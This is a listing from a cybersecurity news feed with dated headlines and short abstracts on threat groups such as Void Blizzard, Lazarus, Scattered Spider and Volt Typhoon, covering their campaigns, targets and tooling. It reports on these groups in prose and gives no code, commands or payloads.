Hacker
May 27, 2025
Russia-Affiliated Threat Actor Void Blizzard Targets NATO and Ukraine with Credential Theft and Cloud Abuse Full Text
Abstract
A newly identified Russia-affiliated threat actor, Void Blizzard (also known as LAUNDRY BEAR), has been conducting widespread cyberespionage operations targeting critical sectors across NATO member states and Ukraine.Microsoft
May 23, 2025
Russian hacker group Killnet returns with new identity Full Text
Abstract
Once known for its pro-Kremlin hacktivist campaigns, the group now appears to function as a profit-driven cyber mercenary collective, offering hack-for-hire services and targeting a broader range of victims.The Record
April 28, 2025
AgeoStealer: How Social Engineering Targets Gamers Full Text
Abstract
Instead of relying on traditional malware distribution channels, the threat actors behind AgeoStealer leverage a popular communication platform among gamers to directly contact victims to test their video game.Flash Point
April 16, 2025
Hacktivist Group Becomes More Sophisticated, Targets Critical Infrastructure to Deploy Ransomware Full Text
Abstract
A recent report shed light on the evolving tactics of hacktivist groups, moving beyond traditional cyber disruptions like DDoS attacks and website defacements to engage in more advanced critical infrastructure attacks and ransomware operations.GBHackers
March 22, 2025
Dragon RaaS: Pro-Russian Hacktivist Group Walks the Razor’s Edge Between Cybercrime and Propaganda Full Text
Abstract
Known as Dragon RaaS, or simply Dragon Team, this emerging group blends political hacktivism with opportunistic cybercrime — all while operating under the shadowy umbrella of “The Five Families” cybercrime syndicate.Security Online
March 21, 2025
Chinese Threat Actor UAT-5918 Targets Critical Infrastructure Entities in Taiwan Full Text
Abstract
Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. Credential harvesting is accomplished by dumping registry hives, NTDS, and using tools such as Mimikatz and browser data stealers.Talos
March 19, 2025
Indonesian Hacking Collective INDOHAXSEC Uncovered Full Text
Abstract
Throughout the last couple of months, the hacktivist group has conducted cyberattacks such as DDoS and has carried out ransomware attacks against numerous entities and governmental bodies in Southeast Asia.Artic Wolf
March 1, 2025
Lotus Blossom Espionage Group Targets Multiple Industries With Different Versions of Sagerunex and Hacking Tools Full Text
Abstract
Cisco Talos uncovered two new variants of the Sagerunex backdoor, which were detected during attacks on telecommunications and media companies, as well as many Sagerunex variants persistent in the government and manufacturing industries.Talo Intelligence
February 18, 2025
EarthKapre Leverages Cloud Infrastructure and DLL Sideloading for Data Exfiltration Full Text
Abstract
This latest attack chain showcases the group’s ability to weaponize legitimate tools, leveraging DLL sideloading techniques and cloud-based infrastructure to stealthily infiltrate networks and exfiltrate sensitive data.ESentire
December 28, 2024
Cyber Espionage Cluster Paper Werewolf Engages in Destructive Behavior Full Text
Abstract
The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (aka GOFFEE), which has conducted at least seven campaigns since 2022. Victims include government, energy, financial, media, and other sectors.Cyware
December 24, 2024
“Holy League” Hacktivist Group Emerges, Targets West Full Text
Abstract
Holy League employs a blend of DDoS attacks, website defacements, and data breaches to incite fear and attract attention. Their propaganda combines dystopian visuals and religious themes.Security Online
December 21, 2024
Unpacking the Diicot Malware Targeting Linux Environments Full Text
Abstract
The Diicot threat group (also known as Mexals) is known for targeting Linux systems using techniques like self-propagating tools, custom UPX packers, Internet scanning, and cryptomining malware like XMRig.Wiz
December 21, 2024
UAC-0125 Abuses Cloudflare Workers to Distribute Malware Disguised as Army+ App Full Text
Abstract
As part of the operation, the hackers create fraudulent websites that mimic the official page of a Ukrainian military app, Army+, tricking users into downloading an executable file disguised as an app installation package.The Hacker News
December 3, 2024
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks Full Text
Abstract
"Phishing emails were sent mainly through email services in Japan and Korea until early September," Korean cybersecurity firm Genians said. "Then, from mid-September, some phishing emails disguised as if they were sent from Russia were observed."The Hacker News
November 20, 2024
Unveiling LIMINAL PANDA - Threats to Telecom Sector Full Text
Abstract
LIMINAL PANDA has used compromised telecom servers to initiate intrusions into further providers in other geographic regions. The adversary conducts elements of their intrusion activity using protocols that support mobile telecommunications.Crowdstrike
November 13, 2024
North Korean Hackers Create Flutter Apps to Bypass macOS Security Full Text
Abstract
North Korean hackers have created Flutter apps to bypass macOS security measures. They created trojanized Notepad apps and minesweeper games using Flutter, which were signed and notarized by legitimate Apple developer IDs.Bleeping Computer
November 12, 2024
Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations Full Text
Abstract
Trend Micro identified two infection chains: the first uses PsExec and WMI for lateral movement, while the second exploits vulnerabilities in Microsoft Exchange servers with ChinaChopper web shell.Trend Micro
November 6, 2024
An Introduction to Operational Relay Box (ORB) Networks - Unpatched, Forgotten, and Obscured Full Text
Abstract
The S2 Research Team at Team Cymru has identified Operational Relay Box (ORB) networks as a rising threat in cybersecurity. These networks combine aspects of VPNs and botnets to enhance anonymity and resilience for threat actors.Cymru
October 10, 2024
CyberVolk: From Hacktivism to Ransomware – Researcher Exposes New Threat Full Text
Abstract
Initially tied to pro-Russian hacktivist movements, CyberVolk has targeted Spain in response to geopolitical events. They have transitioned from DDoS attacks to ransomware, leading coordinated campaigns against Spanish institutions.Security Online
October 7, 2024
FIN7 Hackers Launch Deepfake Nude Generator Sites to Spread Malware Full Text
Abstract
FIN7 gang is hiding malware in AI "Deepnude" sites to lure victims with promises of deepfake tool downloads. Security experts have identified the malicious sites hosted by the Russia-based FIN7 on various aiNude[.]ai domains.Bleeping Computer
October 4, 2024
Andariel Hacking Group Shifts Focus to Financial Attacks on U.S. Organizations Full Text
Abstract
Andariel, a North Korean state-sponsored threat actor, has shifted its focus to conducting financial attacks on U.S. organizations. While three organizations in the U.S. were recently targeted in August 2024, no ransomware was successfully deployed.The Hacker News
September 28, 2024
Cloudflare Warns of India-Linked Hackers Targeting South and East Asian Entities Full Text
Abstract
SloppyLemming has been active since at least July 2021 and has targeted the government, law enforcement, energy, education, telecommunications, and technology sectors in countries such as Pakistan, Sri Lanka, Bangladesh, China, Nepal, and Indonesia.The Hacker News
August 29, 2024
Threat Group ‘Bling Libra’ Pivots to Extortion for Cloud Attacks Full Text
Abstract
The threat group known as Bling Libra, previously linked to the Ticketmaster data breach, has shifted to the double extortion strategy in cloud attacks, according to researchers at Palo Alto Networks' Unit 42.Dark Reading
August 29, 2024
Researchers Unmasked the Notorious Threat Actor USDoD Full Text
Abstract
CrowdStrike researchers have uncovered the identity of the hacker USDoD, also known as EquationCorp, responsible for multiple high-profile data breaches. According to a report from TecMundo, USDoD is a man named Luan BG from Brazil.Security Affairs
July 25, 2024
‘Stargazer Goblin’ Amasses Thousands of Rogue GitHub Accounts to Spread Malware Full Text
Abstract
Stargazer Goblin has been distributing various malware families like Atlantida Stealer, Lumma, and Rhadamanthys, since at least August 2022. The threat actor charges users to "star" repositories with fake accounts, increasing their credibility.Dark Reading
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".Cyble As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.Cybersecurity Dive
May 25, 2024
Sharp Dragon Expands Towards Africa and The Caribbean Full Text
Abstract
The threat actors demonstrate increased caution in selecting their targets, broadening their reconnaissance efforts, and adopting Cobalt Strike Beacon over custom backdoors.Checkpoint
May 8, 2024
Scattered Spider Group a Unique Challenge for Cyber Cops, FBI Leader Says Full Text
Abstract
Identified by analysts in 2022, the hackers use social engineering to lure users into giving up their login credentials or one-time password codes to bypass multifactor authentication.The Record
April 25, 2024
Chinese, Russian Espionage Campaigns Increasingly Targeting Edge Devices Full Text
Abstract
Chinese and Russian hackers have turned their focus to edge devices — like VPN appliances, firewalls, routers and Internet of Things (IoT) tools — amid a startling increase in espionage attacks, according to Google security firm Mandiant.The Record
April 23, 2024
Microsoft Warns of North Korean Hackers Turning to AI-Fueled Cyber Espionage Full Text
Abstract
Microsoft specifically highlighted a group named Emerald Sleet (aka Kimusky or TA427), which has been observed using LLMs to bolster spear-phishing efforts aimed at Korean Peninsula experts.The Hacker News
April 15, 2024
Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft Attacks Full Text
Abstract
The threat actor known as Muddled Libra has been observed actively targeting software-as-a-service (SaaS) applications and cloud service provider (CSP) environments in a bid to exfiltrate sensitive data.The Hacker News
April 13, 2024
North Korean Hackers Exploit Two MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse Full Text
Abstract
The first, not entirely new, sub-technique involves manipulation of Transparency, Consent, and Control (TCC), a security protocol that regulates application permissions on Apple's macOS.Cyware
April 12, 2024
DarkBeatC2: The Latest MuddyWater Attack Framework Full Text
Abstract
The Iranian threat actor known as MuddyWater has been attributed to a new command-and-control (C2) infrastructure called DarkBeatC2, becoming the latest such tool in its arsenal after SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.Cyware
April 6, 2024
Vietnamese Threat Actor Targeting Financial Data Across Asia Full Text
Abstract
Vietnamese financially motivated hackers are targeting businesses across Asia in a campaign to harvest corporate credentials and financial data for resale in online criminal markets.Gov Infosecurity
March 21, 2024
Curious Serpens’ FalseFont Backdoor: Technical Analysis, Detection and Prevention Full Text
Abstract
Curious Serpens has been active since at least 2013. This threat actor is associated with espionage and has targeted organizations in the Middle East, the United States, and Europe.Palo Alto Networks
March 12, 2024
Muddled Libra Threat Group Abuses Pentesting Tools to Infiltrate Networks Full Text
Abstract
Muddled Libra threat actors leverage pentesting tools to identify vulnerabilities in target systems and networks, enabling them to exploit security gaps and gain unauthorized access.Cyware
February 05, 2024
Patchwork Using Romance Scam Lures to Infect Android Devices with VajraSpy Malware Full Text
Abstract
The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called VajraSpy . Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between April 2021 and March 2023. "VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code," security researcher Lukáš Štefanko said . "It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera." As many as 148 devices in Pakistan and India are estimated to have been compromised in the wild. The malicious apps distributed via Google Play and elsewhere primarily masqueradedThe Hacker News
February 01, 2024
FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network Full Text
Abstract
The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security company Akamai said in a report shared with The Hacker News. FritzFrog, first documented by Guardicore (now part of Akamai) in August 2020, is a Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It's known to be active since January 2020. It has since evolved to strike healthcare, education, and government sectors as well as improved its capabilities to ultimately deploy cryptocurrency miners on infected hosts. What's novel about the latest version is the use of the Log4Shell vulnerability as a secondary infection vector to specifically siThe Hacker News
January 23, 2024
North Korean ScarCruft Attackers Gear Up to Target Cybersecurity Professionals Full Text
Abstract
The group is testing innovative infection routines that use technical threat research on another North Korean APT group, Kimsuky, as a lure, indicating a new approach to their cyberattacks.Cyware
January 20, 2024
Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years Full Text
Abstract
An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been attributed to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021. "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities," Google-owned Mandiant said in a Friday report. The vulnerability in question is CVE-2023-34048 (CVSS score: 9.8), an out-of-bounds write that could be put to use by a malicious actor with network access to vCenter Server to achieve remote code execution. It was fixed by the Broadcom-owned company on October 24, 2023. The virtualization services provider, earlier this week, updated its advisory to acknowledge that "exploitation of CVE-2023-34048 has occurred in the wild." UNC3886 first came to light in September 2022 when it wasThe Hacker News
January 13, 2024
Volt Typhoon Ramps Up Malicious Activity Against Critical Infrastructure Full Text
Abstract
Volt Typhoon is using compromised routers as a command-and-control network and deploying a new web shell called "fy.sh" on targeted Cisco routers, indicating a highly active and sophisticated operation.Cyware
January 09, 2024
Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware Full Text
Abstract
A threat actor called Water Curupira has been observed actively distributing the PikaBot loader malware as part of spam campaigns in 2023. "PikaBot's operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server," Trend Micro said in a report published today. The activity began in the first quarter of 2023 that lasted till the end of June, before ramping up again in September. It also overlaps with prior campaigns that have used similar tactics to deliver QakBot, specifically those orchestrated by cybercrime groups known as TA571 and TA577. It's believed that the increase in the number of phishing campaigns related to PikaBot is the result of QakBot's takedown in August, with DarkGate emerging as another replacement. PikaBot is primarily a loader, which meansThe Hacker News
January 6, 2024
Syrian Threat Group Peddles Destructive SilverRAT Full Text
Abstract
A group known as Anonymous Arabic, with links to Turkey and Syria, is behind a sophisticated remote access Trojan called SilverRAT. They plan to release an updated version that can control compromised Windows systems and Android devices.Cyware
December 19, 2023
Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts Full Text
Abstract
Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages. "Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware." Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address. While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that's both inexpensive and reliable. This technique is sneakyThe Hacker News
December 16, 2023
Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds Full Text
Abstract
Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season. The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens. "After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter). The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information,The Hacker News
December 07, 2023
Microsoft Warns of COLDRIVER’s Evolving Evading and Credential-Stealing Tactics Full Text
Abstract
The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446. The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said . Star Blizzard , linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017. In August 2023, Recorded FutureThe Hacker News
November 28, 2023
IMPERIAL KITTEN Deploys Novel Malware Families Full Text
Abstract
Between early 2022 and 2023, CrowdStrike Intelligence observed IMPERIAL KITTEN conduct SWC operations with a focus on targeting organizations in the transportation, logistics, and technology sectors.Cyware
November 10, 2023
Iran-Linked Imperial Kitten Cyber Group Targeting Middle East’s Tech Sectors Full Text
Abstract
A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war. The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name Imperial Kitten , and which is also known as Crimson Sandstorm (previously Curium), TA456, Tortoiseshell, and Yellow Liderc. The latest findings from the company build on prior reports from Mandiant , ClearSky , and PwC , the latter of which also detailed instances of strategic web compromises (aka watering hole attacks) leading to the deployment of IMAPLoader on infected systems. "The adversary, active since at least 2017, likely fulfills Iranian strategic intelligence requirements associated with IRGC operations," CrowdStrike said in a technical report. "Its activity is characterized by its use of social engineering, particularly job recruitment-themed content, to deliThe Hacker News
November 01, 2023
Researchers Expose Prolific Puma’s Underground Link Shortening Service Full Text
Abstract
A threat actor known as Prolific Puma has been maintaining a low profile and operating an underground link shortening service that's offered to other threat actors for at least over the past four years. Prolific Puma creates "domain names with an RDGA [registered domain generation algorithm] and use these domains to provide a link shortening service to other malicious actors, helping them evade detection while they distribute phishing, scams, and malware," Infoblox said in a new analysis pieced together from Domain Name System ( DNS) analytics. With malicious actors known to use link shorteners for phishing attacks, the adversary plays an important role in the cybercrime supply chain, registering between 35,000 to 75,000 unique domain names since April 2022. Prolific Puma is also a DNS threat actor for leveraging DNS infrastructure for nefarious purposes. A notable aspect of the threat actor's operations is the use of an American domain registrar and webThe Hacker News
October 26, 2023
The Rise and Tactics of Octo Tempest: A Cyber Threat Analysis Full Text
Abstract
Octo Tempest, a financially motivated threat group known for extensive social engineering campaigns and SIM-swapping techniques, has become a major concern for businesses worldwide. It has been affiliated with ALPHV/BlackCat and began deploying ransomware payloads as well. Given Octo Tempest's rele ... Read MoreCyware
October 26, 2023
YoroTrooper: Researchers Warn of Kazakhstan’s Stealthy Cyber Espionage Group Full Text
Abstract
A relatively new threat actor known as YoroTrooper is likely made up of operators originating from Kazakhstan. The assessment, which comes from Cisco Talos, is based on their fluency in Kazakh and Russian, use of Tenge to pay for operating infrastructure, and very limited targeting of Kazakhstani entities, barring the government's Anti-Corruption Agency. "YoroTrooper attempts to obfuscate the origin of their operations, employing various tactics to make its malicious activity appear to emanate from Azerbaijan, such as using VPN exit nodes local to that region," security researchers Asheer Malhotra and Vitor Ventura said . First documented by the cybersecurity company in March 2023, the adversary is known to be active since at least June 2022, singling out various state-owned entities in the Commonwealth of Independent States (CIS) countries. Slovak cybersecurity firm ESET is tracking the activity under the name SturgeonPhisher . YoroTrooper's attack cyclesThe Hacker News
October 02, 2023
LUCR-3: Scattered Spider Getting SaaS-y in the Cloud Full Text
Abstract
LUCR-3 overlaps with groups such as Scattered Spider, Oktapus, UNC3944, and STORM-0875 and is a financially motivated attacker that leverages the Identity Provider (IDP) as initial access into an environment with the goal of stealing Intellectual Property (IP) for extortion. LUCR-3 targets Fortune 2000 companies across various sectors, including but not limited to Software, Retail, Hospitality, Manufacturing, and Telecoms. LUCR-3 does not rely heavily on malware or even scripts; instead, LUCR-3 expertly uses victims' own tools, applications, and resources to achieve their goals. At a high level, Initial Access is gained through compromising existing identities in the IDP (Okta: Identity Cloud, Azure AD / Entra, Ping Identity: PingOne). LUCR-3 uses SaaS applications such as document portals, ticketing systems, and chat applications to learn how the victim organization operates and how to access sensitive information. Using the data they gained from reconnaissance within the SaaSThe Hacker News
September 18, 2023
Financially Motivated UNC3944 Threat Actor Shifts Focus to Ransomware Attacks Full Text
Abstract
The financially motivated threat actor known as UNC3944 is pivoting to ransomware deployment as part of an expansion to its monetization strategies, Mandiant has revealed. "UNC3944 has demonstrated a stronger focus on stealing large amounts of sensitive data for extortion purposes and they appear to understand Western business practices, possibly due to the geographical composition of the group," the threat intelligence firm said . "UNC3944 has also consistently relied on publicly available tools and legitimate software in combination with malware available for purchase on underground forums." The group, also known by the names 0ktapus, Scatter Swine, and Scattered Spider, has been active since early 2022, adopting phone-based social engineering and SMS-based phishing to obtain employees' valid credentials using bogus sign-in pages and infiltrate victim organizations, mirroring tactics adopted by another group called LAPSUS$ . While the group originallThe Hacker News
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County Full Text
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say.Cyware
August 25, 2023
China-Linked Flax Typhoon Cyber Espionage Targets Taiwan’s Key Sectors Full Text
Abstract
A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign. The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon , which is also known as Ethereal Panda. "Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said . It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan. A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active siThe Hacker News
August 25, 2023
New Luna Grabber Poses as Roblox Packages, Strikes NPM Full Text
Abstract
Malicious actors are targeting Roblox developers with a new malware called Luna Grabber, distributed through npm packages that impersonate legitimate software. These fake packages, including noblox.js-vps, noblox.js-ssh, and noblox.js-secure, house malicious multi-stage payloads. This campaign ... Read MoreCyware
August 24, 2023
Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware Full Text
Abstract
The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called such as QuiteRAT . Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis published today. What's more, a closer examination of the adversary's recycled attack infrastructure in its cyber assaults on enterprises has led to the discovery of a new threat dubbed CollectionRAT . The fact that the Lazarus Group continues to rely on the same tradecraft despite those components being well-documented over the years underscores the threat actor's confidence in their operations, Talos pointed out. QuiteRAT is said to be a successor to MagicRAT , itself a follow-up to TigerRAT, while CollectionRAT appears to share overlaps with EarlyRAT (aka Jupiter ), an imThe Hacker News
August 24, 2023
Telekopye: Hunting Mammoths using Telegram bot Full Text
Abstract
The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates.Cyware
August 23, 2023
Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead Full Text
Abstract
Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security's p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign targeting various cloud services. While last week Aqua Security published a blog detailing this under-development campaign's stages related to infected Docker images, today Permiso p0 Labs and SentinelLabs are releasing joint research highlighting the incremental updates to the cloud credential harvesting malware samples systematically collected by monitoring the attacker's infrastructure. So get out of your seats and enjoy this scrum meeting stand-up dedicated to sharing knowledge about this actors campaign and the tooling they will use to steal more cloud credentials. If you like IDA screeThe Hacker News
August 23, 2023
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware Full Text
Abstract
A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT. "These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week. CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years. EVLF is said to be operating a web shop to advertise their warez since at least September 2022. CraxsRAT is billed as an Android trojan that enables a threat actor to remote control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers. The malicious package is generated using a builder, which comes with options to cusThe Hacker News
August 22, 2023
EVLF DEV - Knowing the Creator of CypherRAT and CraxsRAT Full Text
Abstract
A fresh player in the realm of cyber threats has emerged under the moniker EVLF DEV, operating as a Malware-as-a-Service (MaaS) provider. Hailing from Syria and active for over eight years, this actor has developed the CypherRAT and CraxsRAT malware strains. To counteract such campaigns by maliciou ... Read MoreCyware
August 18, 2023
#OpFukushima: Anonymous group protests against the plan to dump Fukushima RADIOACTIVE wastewater into Pacific Full Text
Abstract
#OpFukushima: The famous collective Anonymous has launched cyberattacks against Japan nuclear websites over Fukushima water plan. The hacker collective Anonymous has launched cyberattacks against nuclear power-linked groups in Japan as part of an operation...Security Affairs
August 18, 2023
Chinese Hackers Accused of Targeting Southeast Asian Gambling Sector Full Text
Abstract
Hackers based in China are targeting the gambling sector across Southeast Asia in a campaign that researchers say is closely related to data collection and surveillance operations identified earlier this year.Cyware
August 17, 2023
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons Full Text
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin . This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a trojaThe Hacker News
August 17, 2023
Hackers are Increasingly Hiding Within Services Such as Slack and Trello to Deploy Malware Full Text
Abstract
An analysis of more than 400 malware families deployed over the past two years found that at least a quarter of them abused legitimate internet services in some way as part of their infrastructure.Cyware
August 15, 2023
North Korean Hackers Suspected in New Wave of Malicious npm Packages Full Text
Abstract
The npm package registry has emerged as the target of yet another highly targeted attack campaign that aims to entice developers into downloading malevolent modules. Software supply chain security firm Phylum told The Hacker News the activity exhibits similar behaviors to that of a previous attack wave uncovered in June , which has since been linked to North Korean threat actors . As many as nine packages have been identified as uploaded to npm between August 9 and 12, 2023. This includes: ws-paso-jssdk, pingan-vue-floating, srm-front-util, cloud-room-video, progress-player, ynf-core-loader, ynf-core-renderer, ynf-dx-scripts, and ynf-dx-webpack-plugins. "Due to the sophisticated nature of the attack and the small number of affected packages, we suspect this is another highly targeted attack, likely with a social engineering aspect involved in order to get targets to install these packages," the company said . The attack chain commences with the package.json file withThe Hacker News
August 14, 2023
Hacktivists Claim Attacks Against 21 Organizations Over Fukushima Wastewater Release Full Text
Abstract
Anonymous Italia, a group claiming to be affiliated with the hacktivist collective Anonymous, has launched cyber protests against the Japanese government over its decision to release wastewater from the Fukushima Daini Nuclear Power Plant.Cyware
August 8, 2023
New Threat Actor Targets Bulgaria, China, Vietnam, and Other Countries With Customized Yashma Ransomware Full Text
Abstract
The threat actor behind this operation uses an uncommon technique of downloading the ransom note from a GitHub repository, evading detection by embedding it in an embedded batch file.Cyware
August 08, 2023
Hackers Abusing Cloudflare Tunnels for Covert Communications Full Text
Abstract
New research has revealed that threat actors are abusing Cloudflare Tunnels to establish covert communication channels from compromised hosts and retain persistent access. "Cloudflared is functionally very similar to ngrok," Nic Finn, a senior threat intelligence analyst at GuidePoint Security, said . "However, Cloudflared differs from ngrok in that it provides a lot more usability for free, including the ability to host TCP connectivity over cloudflared." A command-line tool for Cloudflare Tunnel, cloudflared allows users to create secure connections between an origin web server and Cloudflare's nearest data center so as to hide the web server IP addresses as well as block volumetric distributed denial-of-service (DDoS) and brute-force login attacks. For a threat actor with elevated access on an infected host, this feature presents a lucrative approach to set up a foothold by generating a token required to establish the tunnel from the victim machine.The Hacker News
August 02, 2023
Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures Full Text
Abstract
A Russia-nexus adversary has been linked to 94 new domains starting March 2023, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities. Cybersecurity firm Recorded Future linked the revamped infrastructure to a threat actor it tracks under the name BlueCharlie , a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53). "These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a technical report shared with The Hacker News. BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linkedThe Hacker News
July 17, 2023
CERT-UA Uncovers Gamaredon’s Rapid Data Exfiltration Tactics Following Initial Compromise Full Text
Abstract
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week. Gamaredon , also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers. It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct reconThe Hacker News
July 12, 2023
Chinese Hackers Deploy Microsoft-Signed Rootkit to Target Gaming Sector Full Text
Abstract
